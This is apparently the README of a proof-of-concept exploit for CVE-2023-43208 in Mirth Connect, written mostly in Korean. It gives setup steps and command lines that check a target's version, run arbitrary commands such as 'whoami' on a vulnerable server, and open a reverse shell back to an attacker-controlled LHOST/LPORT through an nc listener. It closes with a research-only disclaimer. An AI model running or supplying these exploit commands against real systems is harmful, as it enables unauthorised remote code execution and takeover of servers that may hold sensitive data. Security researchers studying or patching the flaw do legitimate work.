
Mirth Connect의 CVE‑2023‑43208을 시연하며, 취약한 인스턴스에서 버전 확인 및 명령 실행을 허용하는 개념 증명 Python 스크립트입니다.
# Create a clean virtual environment
python3 -m venv .venv
source .venv/bin/activate
# Install pinned dependencies
pip install -r requirements.txt
# Check version only
python3 CVE-2023-43208.py -u https://TARGET/ --check
# Execute a single command
python3 CVE-2023-43208.py -u https://TARGET/ -c "whoami"
# Reverse shell (start nc listener first)
python3 CVE-2023-43208.py -u https://TARGET/ -l LHOST -p LPORT
이 개념 증명(PoC)은 연구 및 교육 목적으로만 제공됩니다. 소유하지 않았거나 테스트할 명시적 권한이 없는 시스템에 사용하지 마십시오. 저자는 이 코드로 인한 오용 또는 손해에 대해 책임지지 않습니다.